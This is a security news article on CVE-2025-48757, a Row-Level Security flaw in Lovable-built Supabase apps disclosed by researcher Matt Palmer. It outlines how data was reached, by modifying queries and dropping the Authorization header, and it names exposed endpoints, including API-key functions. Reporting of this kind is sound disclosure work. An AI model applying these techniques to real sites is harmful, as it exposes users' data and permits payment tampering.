CVE-2025-48757: Lovable’s Row-Level Security Breakdown Exposes Sensitive Data Across Hundreds of Projects

Security researcher Matt Palmer has uncovered a critical vulnerability in the Lovable low-code platform, now tracked as CVE-2025-48757, that allows unauthenticated access and data modification due to misconfigured Row-Level Security (RLS). The flaw affects a wide range of apps built using Lovable’s integration with Supabase, including high-profile sites like Linkable, a platform designed to auto-generate websites from LinkedIn profiles.

With a CVSS score of 9.3, the vulnerability enables threat actors to bypass client-side authentication checks, view sensitive user information, and inject or manipulate data—all without proper authorization.

“Applications developed using its platform often lack secure RLS configurations, allowing unauthorized actors to access sensitive user data and inject malicious data,” Matt Palmer explains.

Lovable applications rely on a client-heavy architecture that delegates backend services like authentication and data storage to platforms such as Supabase. The issue lies in how RLS policies are misaligned between frontend logic and backend enforcement.

“This architecture shifts the security burden to the implementor… misaligned RLS policies between the client-side logic and backend enforcement frequently result in vulnerabilities,” the report warns.

Palmer found that in many cases, simply modifying a network query would expose full tables of user data.

The flaw was first noticed on March 20, 2025, in Linkable, which lacked any meaningful RLS enforcement. A modified query allowed full access to the “users” table. Despite public disclosure via Twitter, Lovable initially denied the issue, deleted the site, then later reinstated it with a $2 paywall.

“An inspection of network requests revealed that modifying a query granted access to all data in the project’s ‘users’ table.”

Palmer wrote a custom script to crawl 1,645 Lovable-powered projects, discovering 303 insecure endpoints across 170 sites (10.3%). These included highly sensitive exposed endpoints, such as:

• /rest/v1/users
• /rest/v1/transactions
• /functions/v1/get-google-maps-token
• /rest/v1/rpc/get_gemini_api_key

The researcher stresses that this analysis only examined public homepages—suggesting that even more sensitive data could be exposed within authenticated sessions.

Even after Lovable’s release of a “security scan” tool, vulnerabilities persisted. In a May 24 reassessment, Palmer bypassed access controls on Linkable by removing the Authorization header. Not only was data visible, but malicious POST requests were accepted, including manipulated Stripe payment status fields.

“Lovable confirmed receipt, but never responded… With no meaningful remediation or user notification, we published our CVE,” Palmer disclosures.

CVE-2025-48757 is not a simple bug—it’s a systemic design failure rooted in poor enforcement of backend access controls in low-code platforms. While tools like Supabase support robust RLS features, Lovable’s abstraction layer exposes users to risk when used improperly.

Palmer warns: “Users interacting with Lovable-built sites should exercise extreme caution in the data they submit.”

Related Posts:

• CVE-2024-8940 (CVSS 10): Critical Flaw in Scriptcase Low-Code Platform Leaves Developers at Risk
• New VMware Findings: Kernel Drivers’ Vulnerabilities Risk Total Device Takeover
• Driver Signature Enforcement Cracked: OS Downgrade Attacks Possible on Windows
• Nintendo Switch 2 Hacked? Early Exploit Uncovered!